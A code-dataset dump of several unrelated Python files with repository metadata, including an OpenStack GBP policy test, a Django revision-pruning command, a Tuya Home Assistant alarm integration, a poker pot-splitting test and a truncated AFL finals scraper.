self.gbpcfg.gbp_del_all_anyobj(obj)
def test_gbp_l3p_func_1(
self,
name_uuid='',
l3p_uuid='',
rep_cr=0,
rep_del=0):
if rep_cr == 0 and rep_del == 0:
self._log.info(
"\n########################################################\n"
"TESTCASE_GBP_L3P_FUNC_1: TO CREATE/VERIFY/DELETE/VERIFY a "
"L3POLICY with DEFAULT ATTRIB VALUE\n"
"TEST_STEPS::\n"
"Create L3 Policy Object\n"
"Verify the attributes & value, show & list cmds\n"
"Verify the implicit neutron objects\n"
"Delete L3 Policy Object\n"
"Verify that PR and implicit neutron objects has got "
"deleted, show & list cmds\n"
"##########################################################\n")
if name_uuid == '':
name_uuid = self.l3p_name
# Testcase work-flow starts
if rep_cr == 0 or rep_cr == 1:
self._log.info(
'\n## Step 1: Create L3Policy with default attrib vals##\n')
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(1, 'l3p', name_uuid)
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
# default subnet= 10.0.0.0/8 & subnet_prefix_length= 24
self._log.info('# Step 2A: Verify L3Policy using -list cmd')
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
0, 'l3p', l3p_uuid, name_uuid, '10.0.0.0/8', '24') == 0:
self._log.info(
"\n## Step 2A: Verify L3Policy using -list option "
"== Failed")
return 0
self._log.info('# Step 2B: Verify L3Policy using -show cmd')
if 'Ubuntu' in platform.linux_distribution(): # Only for devstack
rtr_uuid = self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
ret='default',
id=l3p_uuid,
name=name_uuid,
ip_pool='10.0.0.0/8',
subnet_prefix_length='24',
ip_version='4')
if rtr_uuid != 0 and isinstance(rtr_uuid, str):
rtr_name = 'l3p_%s' % (name_uuid)
if self.gbpverify.neut_ver_all(
'router',
rtr_uuid,
name=rtr_name,
admin_state_up='True',
status='ACTIVE') == 0:
self._log.info(
"\n## Step 2D: Verify L3Policy using -show "
"option == Failed")
return 0
else:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show "
"option == Failed")
return 0
else:
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
id=l3p_uuid,
name=name_uuid,
ip_pool='10.0.0.0/8',
subnet_prefix_length='24',
ip_version='4') == 0:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show "
"option == Failed")
return 0
#######
if rep_del == 0 or rep_del == 1:
self._log.info('\n## Step 3: Delete L3Policy using name ##\n')
if self.gbpcfg.gbp_policy_cfg_all(0, 'l3p', name_uuid) == 0:
self._log.info("\n## Step 3: Delete L3Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
0, 'l3p', name_uuid, l3p_uuid) != 0:
self._log.info(
"\n## Step 3A: Verify L3Policy is Deleted using "
"-list option == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1, 'l3p', name_uuid, l3p_uuid) != 0:
self._log.info(
"\n## Step 3B: Verify L3Policy is Deleted using "
"-show option == Failed")
return 0
if rep_cr == 0 and rep_del == 0:
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_1: PASSED")
return 1
def test_gbp_l3p_func_2(self):
self._log.info(
"\n############################################################\n"
"TESTCASE_GBP_L3P_FUNC_2: TO CREATE/UPDATE/DELETE/VERIFY a "
"L3POLICY with EDITABLE ATTRs\n"
"TEST_STEPS::\n"
"Create L3Policy Object with non-default params\n"
"Verify the attributes & value, show & list cmds\n"
"Update the L3Policy Objects\n"
"Verify the attributes & value, show & list cmds\n"
"Delete L3Policy using Name\n"
"Verify that L3P has got deleted, show & list cmds\n"
"##############################################################\n")
# Testcase work-flow starts
self._log.info(
"\n## Step 1: Create Policy L3Policy with non-default "
"attrs and values ##")
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(
1, 'l3p', self.l3p_name, ip_pool='20.20.0.0/24',
subnet_prefix_length='28')
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
self._log.info('\n## Step 2B: Verify L3Policy using -show cmd')
if 'Ubuntu' in platform.linux_distribution(): # Only for devstack
rtr_uuid = self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
ret='default',
id=l3p_uuid,
name=self.l3p_name,
ip_pool='20.20.0.0/24',
subnet_prefix_length='28',
ip_version='4')
if rtr_uuid != 0 and isinstance(rtr_uuid, str):
rtr_name = 'l3p_%s' % (self.l3p_name)
if self.gbpverify.neut_ver_all(
'router',
rtr_uuid,
name=rtr_name,
admin_state_up='True',
status='ACTIVE') == 0:
self._log.info(
"\n## Step 2D: Verify L3Policy using -show option"
" == Failed")
return 0
else:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show option"
" == Failed")
return 0
else:
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
id=l3p_uuid,
name=self.l3p_name,
ip_pool='20.20.0.0/24',
subnet_prefix_length='28',
ip_version='4') == 0:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show option"
" == Failed")
return 0
if self.gbpcfg.gbp_policy_cfg_all(
2, 'l3p', self.l3p_name, subnet_prefix_length='26') == 0:
self._log.info(
"\n## Step 3: UPdating L3Policy attributes == Failed")
return 0
self._log.info(
"\n## Step 3: Verify that Updated Attributes in L3Policy")
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
self.l3p_name,
id=l3p_uuid,
name=self.l3p_name,
ip_pool='20.20.0.0/24',
subnet_prefix_length='26',
ip_version='4') == 0:
self._log.info(
"\n## Step 3: Verify L3Policy using -show option == Failed")
return 0
self.test_gbp_l3p_func_1(name_uuid=l3p_uuid, rep_cr=2)
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_2: PASSED")
return 1
def test_gbp_l3p_func_3(self):
self._log.info(
"\n############################################################\n"
"TESTCASE_GBP_L3P_FUNC_3: TO CREATE/UPDATE/DELETE/VERIFY "
"L3POLICY AND ASSOCIATED L2POLICY\n"
"TEST_STEPS::\n"
"Create L3Policy with defined attributes\n"
"Create L2Policy with default attributes\n"
"Update L2Policy to change the from default to the above "
"non-default L3Policy\n"
"Verify the Update of L3Policy attribute of L2Policy fails\n"
"Update L3Policy(default) editable attributes\n"
"Delete the L2Policy(this causes auto-delete of default-L3Pol)\n"
"Verify L3/L2Policies successfully deleted\n"
"##############################################################\n")
# Testcase work-flow starts
# Create L2 L3 Policy
self._log.info(
"\n## Step 1: Create L3Policy with non-default attrs and "
"values ##")
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(
1, 'l3p', self.l3p_name, ip_pool='20.20.0.0/24',
subnet_prefix_length='28',
proxy_ip_pool='192.167.0.0/16')
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
self._log.info(
'\n## Step 1A: Create L2Policy with default attributes##\n')
l2p = self.gbpcfg.gbp_policy_cfg_all(1, 'l2p', self.l2p_name)
if l2p == 0:
self._log.info(
"\n## New L2Policy Create Failed, hence "
"Testcase_gbp_l3p_func_3 ABORTED\n")
return 0
elif len(l2p) < 2:
self._log.info(
"\n## New L2Policy Create Failed due to "
"unexpected tuple length\n")
return 0
else:
l2p_uuid, def_l3p_uuid = l2p[0], l2p[1]
# Associating L2Policy with non-default L3Policy(should Fail) and
# updating the L3Policy (in-use/default)
if self.gbpcfg.gbp_policy_cfg_all(
2, 'l2p', self.l2p_name, l3_policy_id=l3p_uuid) != 0:
self._log.info(
"\n## Updating/Changing L3Policy attribute of "
"L2Policy did NOT Fail")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1, 'l2p', self.l2p_name, l3_policy_id=def_l3p_uuid) == 0:
self._log.info(
"\n## Step 3A: Verify L2Policy is still associated to "
"its default L3Policy == Failed")
return 0
if self.gbpcfg.gbp_policy_cfg_all(
2, 'l3p', def_l3p_uuid, subnet_prefix_length='27') == 0:
self._log.info(
"\n## Step 4: UPdating default L3Policy's "
"attributes == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
def_l3p_uuid,
id=def_l3p_uuid,
ip_pool='10.0.0.0/8',
l2_policies=l2p_uuid,
subnet_prefix_length='27',
ip_version='4') == 0:
self._log.info(
"\n## Step 4A: Verify L3Policy after associating "
"to the L2Policy == Failed")
return 0
# Delete L2/L3 Policies
if self.gbpcfg.gbp_policy_cfg_all(0, 'l2p', l2p_uuid) == 0:
self._log.info("\n## Step 5: Delete L2Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(1, 'l2p', l2p_uuid) != 0:
self._log.info("\n## Step 5A: Verify Delete of L2Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(1, 'l3p', def_l3p_uuid) != 0:
self._log.info(
"\n## Step 5B: Verify Auto-Delete of default "
"L3Policy == Failed")
return 0
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_3: PASSED")
return 1
def test_gbp_l3p_func_4(self):
self._log.info(
"\n############################################################\n"
"TESTCASE_GBP_L3P_FUNC_4: TO CREATE/UPDATE/DELETE/VERIFY "
"MULTI L2POLICY to SINGLE L3POLICY\n"
"TEST_STEPS::\n"
"Create non-default L3Policy with defined attributes\n"
"Create Multiple L2Policies with above non-default L3policy\n"
"Verify that L2Policies are created with non-default L3Policy\n"
"Delete all L2 Policies\n"
"Verify that non-default L3 Policy exists but with null "
"L2Policies\n"
"Delete the L3Policy\n"
"Verify L3/L2Policys successfully deleted\n"
"##############################################################\n")
# Testcase work-flow starts
# Create and Verify non-default L3 Policy
self._log.info(
"\n## Step 1: Create Policy L3Policy with non-default "
"attrs and values ")
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(
1, 'l3p', self.l3p_name, ip_pool='40.50.0.0/16',
subnet_prefix_length='25')
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
id=l3p_uuid,
name=self.l3p_name,
ip_pool='40.50.0.0/16',
subnet_prefix_length='25',
ip_version='4') == 0:
self._log.info("\n## Step 1A: Verify non-default == Failed")
return 0
# Create and verify multiple L2 policy with above non-default L3P
self._log.info(
"\n## Step 2: Create and Verify multiple(n=10) L2Policy "
"associated with 1 non-default L3P")
l2p_uuid_list = []
n, i = 11, 1
while i < n:
l2p_name = 'demo_l2p_%s' % (i)
l2p = self.gbpcfg.gbp_policy_cfg_all(
1, 'l2p', l2p_name, l3_policy_id=l3p_uuid)
if l2p == 0:
self._log.info(
"\n## Step 2B:New L2Policy Create Failed, hence "
"Testcase_gbp_l3p_func_4 ABORTED\n")
return 0
elif len(l2p) < 2:
self._log.info(
"\n## Step 2C: New L2Policy Create Failed due to "
"unexpected tuple length\n")
return 0
else:
l2p_uuid = l2p[0]
l2p_uuid_list.append(l2p_uuid)
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1, 'l2p', l2p_name, id=l2p_uuid,
l3_policy_id=l3p_uuid) == 0:
self._log.info(
"\n## Step 2D: Verify L2Policy using non-default "
"L3P == Failed")
return 0
i += 1
# Verify that non-default L3P has all the above created L2Ps
if self.gbpverify.gbp_obj_ver_attr_all_values(
'l3p', l3p_uuid, 'l2_policies', l2p_uuid_list) == 0:
self._log.info(
"\n## Step 2E: Verifying multiple L2Ps mapped to "
"non-default L3P == Failed \n")
return 0
# Delete all L2Ps and verify that non-default L3P has null L2Ps
self._log.info(
"\n## Step 3: Delete all L2Ps and verify that non-default "
"L3P has no L2P associated\n")
for l2pid in l2p_uuid_list:
if self.gbpcfg.gbp_policy_cfg_all(0, 'l2p', l2pid) == 0:
self._log.info(
"\n## Step 3: Delete of L2P %s == Failed\n" %
(l2pid))
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(1, 'l2p', l2pid) != 0:
self._log.info(
"\n## Step 3A: Verify that L2P got deleted == Failed\n")
return 0
if self.gbpverify.gbp_obj_ver_attr_all_values(
'l3p', l3p_uuid, 'l2_policies', l2p_uuid_list) != 0:
self._log.info(
"\n## Step 3B: Verifying Non-Default L3P has no more "
"L2P mapped == Failed \n")
return 0
self.test_gbp_l3p_func_1(name_uuid=l3p_uuid, rep_cr=2)
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_4: PASSED")
return 1
if __name__ == '__main__':
main()
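# Usage sketch (assumptions: Python 2, since the `commands` module was removed
# in Python 3; a GBP/devstack environment reachable from this host; and the
# sibling `libs` package importable):
#   python tc_gbp_l3p_func.py
# Per-testcase results are appended to test_results.txt by
# utils_libs.report_results().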
| 41.735931 | 79 | 0.5014 | 2,301 | 19,282 | 3.982616 | 0.119513 | 0.042012 | 0.066019 | 0.068093 | 0.672959 | 0.625928 | 0.554343 | 0.539502 | 0.490506 | 0.38684 | 0 | 0.05039 | 0.374235 | 19,282 | 461 | 80 | 41.826464 | 0.7091 | 0.060108 | 0 | 0.519704 | 0 | 0 | 0.309936 | 0.055024 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017241 | false | 0.009852 | 0.017241 | 0 | 0.133005 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a848423e492401e4b81870e79dad04556d2ff579 | 6,166 | py | Python | onadata/apps/logger/management/commands/delete_revisions.py | ubpd/kobocat | 45906e07e8f05c30e3e26bab5570a8ab1ee264db | [
"BSD-2-Clause"
] | null | null | null | onadata/apps/logger/management/commands/delete_revisions.py | ubpd/kobocat | 45906e07e8f05c30e3e26bab5570a8ab1ee264db | [
"BSD-2-Clause"
] | null | null | null | onadata/apps/logger/management/commands/delete_revisions.py | ubpd/kobocat | 45906e07e8f05c30e3e26bab5570a8ab1ee264db | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
from __future__ import unicode_literals, print_function, division, absolute_import
from datetime import timedelta
import sys
from django.db import transaction, models, router, connection
from django.utils import timezone
from reversion.models import Revision, Version
from reversion.management.commands.deleterevisions import Command as RevisionCommand
class Command(RevisionCommand):
help = "Deletes revisions (by chunks) for a given app [and model]"
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
"--chunks",
default=1000,
type=int,
help="Delete only revisions by batch of `chunks` records.",
)
parser.add_argument(
"--vacuum",
action='store_true',
default=False,
help="Run `VACUUM` on tables after deletion.",
)
parser.add_argument(
"--vacuum-full",
action='store_true',
default=False,
help="Run `VACUUM FULL` instead of `VACUUM`.",
)
def handle(self, *app_labels, **options):
verbosity = options["verbosity"]
using = options["using"]
model_db = options["model_db"]
days = options["days"]
keep = options["keep"]
chunks = options["chunks"]
vacuum_full = options["vacuum_full"]
vacuum = options["vacuum"]
# Delete revisions.
using = using or router.db_for_write(Revision)
revisions_to_delete_count = 0
revision_query = models.Q()
keep_revision_ids = set()
# By default, delete nothing.
can_delete = False
# Get all revisions for the given revision manager and model.
for model in self.get_models(options):
if verbosity >= 1:
self.stdout.write("Finding stale revisions for {name}".format(
name=model._meta.verbose_name,
))
# Find all matching revision IDs.
model_query = Version.objects.using(using).get_for_model(
model,
model_db=model_db,
)
if keep:
overflow_object_ids = list(Version.objects.using(using).get_for_model(
model,
model_db=model_db,
).order_by().values_list("object_id").annotate(
count=models.Count("object_id"),
).filter(
count__gt=keep,
).values_list("object_id", flat=True).iterator())
# Only delete overflow revisions.
model_query = model_query.filter(object_id__in=overflow_object_ids)
for object_id in overflow_object_ids:
if verbosity >= 2:
self.stdout.write("- Finding stale revisions for {name} #{object_id}".format(
name=model._meta.verbose_name,
object_id=object_id,
))
# But keep the underflow revisions.
keep_revision_ids.update(Version.objects.using(using).get_for_object_reference(
model,
object_id,
model_db=model_db,
).values_list("revision_id", flat=True)[:keep].iterator())
# Add to revision query.
revision_query |= models.Q(
pk__in=model_query.order_by().values_list("revision_id", flat=True)
)
# If we have at least one model, then we can delete.
can_delete = True
if can_delete:
revisions_to_delete = Revision.objects.using(using).filter(
revision_query,
date_created__lt=timezone.now() - timedelta(days=days),
).exclude(
pk__in=keep_revision_ids
).order_by()
else:
revisions_to_delete = Revision.objects.using(using).none()
# The total count is needed below to flush the final (partial) chunk,
# so compute it regardless of verbosity.
revisions_to_delete_count = revisions_to_delete.count()
chunked_delete_ids = []
chunks_counter = 1
for revision_id in revisions_to_delete.values_list("id", flat=True).iterator():
chunked_delete_ids.append(revision_id)
if (chunks_counter % chunks) == 0 or chunks_counter == revisions_to_delete_count:
# Wrap into a transaction because of CASCADE, post_delete signals. (e.g. `revision_revision`)
with transaction.atomic(using=using):
chunked_revisions_to_delete = Revision.objects.filter(id__in=chunked_delete_ids)
if verbosity >= 1:
progress = "\rDeleting {chunk}/{total} revisions...".format(
chunk=chunks_counter,
total=revisions_to_delete_count
)
sys.stdout.write(progress)
sys.stdout.flush()
chunked_revisions_to_delete.delete()
chunked_delete_ids = []
chunks_counter += 1
# Finish the progress line with a newline
print("")
if vacuum is True or vacuum_full is True:
self._do_vacuum(vacuum_full)
print("Done!")
def _do_vacuum(self, full=False):
cursor = connection.cursor()
if full:
print("Vacuuming (full) table {}...".format(Revision._meta.db_table))
cursor.execute("VACUUM FULL {}".format(Revision._meta.db_table))
print("Vacuuming (full) table {}...".format(Version._meta.db_table))
cursor.execute("VACUUM FULL {}".format(Version._meta.db_table))
else:
print("Vacuuming table {}...".format(Revision._meta.db_table))
cursor.execute("VACUUM {}".format(Revision._meta.db_table))
print("Vacuuming table {}...".format(Version._meta.db_table))
cursor.execute("VACUUM {}".format(Version._meta.db_table))
connection.commit()
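# Usage sketch (the app label plus --days/--keep/--using/--model-db come from
# django-reversion's base deleterevisions command; the values here are
# illustrative):
#   python manage.py delete_revisions logger --days 30 --keep 3 --chunks 500 --vacuum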
| 39.525641 | 109 | 0.567142 | 651 | 6,166 | 5.129032 | 0.258065 | 0.032944 | 0.050913 | 0.032944 | 0.299491 | 0.272537 | 0.194669 | 0.146152 | 0.090446 | 0.032345 | 0 | 0.003175 | 0.336036 | 6,166 | 155 | 110 | 39.780645 | 0.812408 | 0.071359 | 0 | 0.196721 | 0 | 0 | 0.106443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02459 | false | 0 | 0.057377 | 0 | 0.098361 | 0.057377 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a848bb27e6fc70b43ba99742234a08f7e151bf98 | 4,466 | py | Python | custom_components/tuya_v2/alarm_control_panel.py | nickw444/tuya-home-assistant | acdd69f7b56e4c1e225cdc146d68d48e2c79dafb | [
"MIT"
] | 1 | 2021-07-30T03:07:01.000Z | 2021-07-30T03:07:01.000Z | custom_components/tuya_v2/alarm_control_panel.py | nickw444/tuya-home-assistant | acdd69f7b56e4c1e225cdc146d68d48e2c79dafb | [
"MIT"
] | 3 | 2021-08-14T16:02:31.000Z | 2021-10-16T21:27:43.000Z | custom_components/tuya_v2/alarm_control_panel.py | nickw444/tuya-home-assistant | acdd69f7b56e4c1e225cdc146d68d48e2c79dafb | [
"MIT"
] | null | null | null | """Support for Tuya Alarm Control."""
import logging
from typing import Callable
from homeassistant.components.alarm_control_panel import DOMAIN as DEVICE_DOMAIN
from homeassistant.components.alarm_control_panel import (
SUPPORT_ALARM_TRIGGER,
AlarmControlPanelEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import STATE_ALARM_ARMING, STATE_ALARM_TRIGGERED
from homeassistant.core import HomeAssistant
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from tuya_iot import TuyaDevice, TuyaDeviceManager
from .base import TuyaHaDevice
from .const import (
DOMAIN,
TUYA_DEVICE_MANAGER,
TUYA_DISCOVERY_NEW,
TUYA_HA_DEVICES,
TUYA_HA_TUYA_MAP,
)
_LOGGER = logging.getLogger(__name__)
TUYA_SUPPORT_TYPE = [
"ywbj", # Smoke Detector
"rqbj", # Gas Detector
"pir", # PIR Detector
]
# Smoke Detector
# https://developer.tuya.com/en/docs/iot/s?id=K9gf48r5i2iiy
DPCODE_SMOKE_SENSOR_STATE = "smoke_sensor_state"
DPCODE_GAS_SENSOR_STATE = "gas_sensor_state"
DPCODE_PIR = "pir"
async def async_setup_entry(
hass: HomeAssistant, _entry: ConfigEntry, async_add_entities: AddEntitiesCallback
):
"""Set up tuya alarm dynamically through tuya discovery."""
_LOGGER.info("alarm init")
hass.data[DOMAIN][TUYA_HA_TUYA_MAP].update({DEVICE_DOMAIN: TUYA_SUPPORT_TYPE})
async def async_discover_device(dev_ids):
"""Discover and add a discovered tuya sensor."""
_LOGGER.info("alarm add->", dev_ids)
if not dev_ids:
return
entities = await hass.async_add_executor_job(_setup_entities, hass, dev_ids)
hass.data[DOMAIN][TUYA_HA_DEVICES].extend(entities)
async_add_entities(entities)
async_dispatcher_connect(
hass, TUYA_DISCOVERY_NEW.format(DEVICE_DOMAIN), async_discover_device
)
device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]
device_ids = []
for (device_id, device) in device_manager.device_map.items():
if device.category in TUYA_SUPPORT_TYPE:
device_ids.append(device_id)
await async_discover_device(device_ids)
def _setup_entities(hass: HomeAssistant, device_ids: list):
"""Set up Tuya Switch device."""
device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]
entities = []
for device_id in device_ids:
device = device_manager.device_map[device_id]
if device is None:
continue
if DPCODE_SMOKE_SENSOR_STATE in device.status:
entities.append(
TuyaHaAlarm(
device,
device_manager,
(
lambda d: STATE_ALARM_TRIGGERED
if d.status.get(DPCODE_SMOKE_SENSOR_STATE, 1) == "1"
else STATE_ALARM_ARMING
),
)
)
if DPCODE_GAS_SENSOR_STATE in device.status:
entities.append(
TuyaHaAlarm(
device,
device_manager,
(
lambda d: STATE_ALARM_TRIGGERED
if d.status.get(DPCODE_GAS_SENSOR_STATE, 1) == "1"
else STATE_ALARM_ARMING
),
)
)
if DPCODE_PIR in device.status:
entities.append(
TuyaHaAlarm(
device,
device_manager,
(
lambda d: STATE_ALARM_TRIGGERED
if d.status.get(DPCODE_PIR, "none") == "pir"
else STATE_ALARM_ARMING
),
)
)
return entities
class TuyaHaAlarm(TuyaHaDevice, AlarmControlPanelEntity):
"""Tuya Alarm Device."""
def __init__(
self,
device: TuyaDevice,
device_manager: TuyaDeviceManager,
sensor_is_on: Callable[..., str],
) -> None:
"""Init TuyaHaAlarm."""
super().__init__(device, device_manager)
self._is_on = sensor_is_on
@property
def state(self):
"""Return is alarm on."""
return self._is_on(self.tuya_device)
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
return SUPPORT_ALARM_TRIGGER
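# Illustrative mapping example (hypothetical payload, not taken from the Tuya
# docs), showing what _map_endpoint_data does with a raw endpoint dict:
#   DeviceStateChanges._map_endpoint_data(
#       {"ep": "abc123", "ept": "smoke", "channel": "registrations",
#        "resources": [{"path": "/3200/0/5501", "obs": 1}]})
# returns
#   {"device_id": "abc123", "alias": None, "device_type": "smoke",
#    "queue_mode": None, "channel": "registrations",
#    "resources": [{"path": "/3200/0/5501", "type": None,
#                   "content_type": None, "observable": 1}]}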
| 31.230769 | 85 | 0.628527 | 483 | 4,466 | 5.488613 | 0.248447 | 0.058846 | 0.05017 | 0.030177 | 0.246322 | 0.231234 | 0.231234 | 0.193512 | 0.193512 | 0.15579 | 0 | 0.002861 | 0.295567 | 4,466 | 142 | 86 | 31.450704 | 0.839797 | 0.060233 | 0 | 0.227273 | 0 | 0 | 0.019236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0 | 0.109091 | 0 | 0.190909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a849776d81c960774b6a444083c983385fa4a090 | 530 | py | Python | tests/test_texas_game.py | seaglex/texas | c22579b74fc0473cdc0a4892f7227d6e0a373470 | [
"MIT"
] | null | null | null | tests/test_texas_game.py | seaglex/texas | c22579b74fc0473cdc0a4892f7227d6e0a373470 | [
"MIT"
] | null | null | null | tests/test_texas_game.py | seaglex/texas | c22579b74fc0473cdc0a4892f7227d6e0a373470 | [
"MIT"
] | null | null | null | import unittest
from texas import texas_games
from texas.judge import TexasJudge
class TexasGameTestCase(unittest.TestCase):
def test_dividing_money(self):
judge = TexasJudge()
game = texas_games.NoLimitTexasGame(judge)
amounts = game._divide_the_money(500, [300, None, None, None], [0, 0, 1, 2])
self.assertEquals(list(amounts), [150, 350, 0, 0])
amounts = game._divide_the_money(500, [300, 400, 200, None], [0, 0, 1, 1])
self.assertEquals(list(amounts), [150, 250, 0, 100])
| 37.857143 | 84 | 0.669811 | 72 | 530 | 4.791667 | 0.472222 | 0.017391 | 0.098551 | 0.115942 | 0.353623 | 0.17971 | 0.17971 | 0 | 0 | 0 | 0 | 0.103774 | 0.2 | 530 | 13 | 85 | 40.769231 | 0.709906 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.090909 | false | 0 | 0.272727 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84b852a96578b68cecedef7453c37c2c7438549 | 8,940 | py | Python | prelim.py | RyanFrancis0/afl_graphs | c7da6be317cc148c1e442916c45692b20c9abf73 | [
"MIT"
] | 1 | 2020-06-16T05:59:51.000Z | 2020-06-16T05:59:51.000Z | prelim.py | RyanFrancis0/afl_graphs | c7da6be317cc148c1e442916c45692b20c9abf73 | [
"MIT"
] | null | null | null | prelim.py | RyanFrancis0/afl_graphs | c7da6be317cc148c1e442916c45692b20c9abf73 | [
"MIT"
] | null | null | null |
import statistics
import ast
import os
import matplotlib.pyplot as plt
import numpy as np
import urllib.request
from bs4 import BeautifulSoup
script_directory = str(os.path.dirname(os.path.realpath(__file__)))
file_name = "prelimsavefile.txt"
path_to_file = script_directory + '\\' + file_name
"""
README:
If last_season (see constants below) isn't the last season in the AFL in which prelims were played OR you haven't
run this file on this computer before (Because of the 120+ webpages that need to be accessed, the amount of
processing that needs to be done on that accessed data and the fact that 99.99% of the times you run this file
the data doesn't need updating I save the data to a txt file in the folder this program is in rather than
gather it anew):
1. change it to the correct season
2. uncomment the RETRIEVE DATA section below
3. run the program
4. close the graph that opens up
5. recomment that section
6. save this file
I could've made that above process automatic but couldn't be bothered/didn't want to bother afltables.com every time
someone runs this
"""
#Constants
last_season = 2020 #?
universalURL = 'https://afltables.com/afl/seas/{}.html'
year_started = 1990 # 1897<- interesting
colours = {"GoldCoast":"yellow", "Geelong":"royalblue", "Essendon":"red", "Carlton":"navy", "Collingwood":"black", "Melbourne":"lime", "Hawthorn":"brown", "Fitzroy":"grey", "St Kilda":"crimson", "Richmond":"yellow", "North Melbourne":"blue", "Western Bulldogs":"green", "Fremantle":"purple","Greater Western Sydney":"orange", "Brisbane Lions": "orangered", "Port Adelaide":"cyan", "West Coast":"darkgoldenrod", "Sydney":"deeppink", "Adelaide":"royalblue"} #ugh takes so long to write out
def getURL(url):
stream = urllib.request.urlopen(url)
text = stream.read().decode('utf-8')
stream.close()
return text
"""
Convert float to 2 decimal place percentage string with percent sign on the end
Input (float): f
returns (str): f * 100, rounded to 2 decimal places, with percent symbol on end
"""
def p(f):
return str(round(100 * f, 2)) + '%'
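# e.g. p(0.1234) -> '12.34%'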
with open(path_to_file, "r") as f:
clubs = ast.literal_eval(f.read())
#MAIN:
""" RETRIEVE DATA
clubs = {} # {"club":[[years total], [years won]]}
for k in range(year_started, last_season + 1):
text = getURL(universalURL.format(k))
soup = BeautifulSoup(text, 'html.parser')
tables = soup.findAll('table')
if tables[-2].text != "Grand Final":
#1987 & 1924
continue
flag = False
for i in tables:
if flag == True:
flag = False
data = i.findAll('tr')
team1 = data[0].find('a').text
team2 = data[1].find('a').text
if team1 == "Kangaroos":
team1 = "North Melbourne"
elif team1 == "Brisbane Bears":
team1 = "Brisbane Lions"
elif team1 == "Footscray":
team1 = "Western Bulldogs"
elif team1 == "South Melbourne":
team1 = "Sydney"
if team2 == "Kangaroos":
team2 = "North Melbourne"
elif team2 == "Brisbane Bears":
team2 = "Brisbane Lions"
elif team2 == "Footscray":
team2 = "Western Bulldogs"
elif team2 == "South Melbourne":
team2 = "Sydney"
if team1 in clubs:
clubs[team1][0].append(k)
else:
clubs[team1] = [[k], []]
if team2 in clubs:
clubs[team2][0].append(k)
else:
clubs[team2] = [[k], []]
if i.text == "Preliminary Final":
flag = True
gfdata = tables[len(tables) - 1].findAll('tr')
team1 = gfdata[0].find('a').text
team2 = gfdata[1].find('a').text
if team1 == "Kangaroos":
team1 = "North Melbourne"
elif team1 == "Brisbane Bears":
team1 = "Brisbane Lions"
elif team1 == "Footscray":
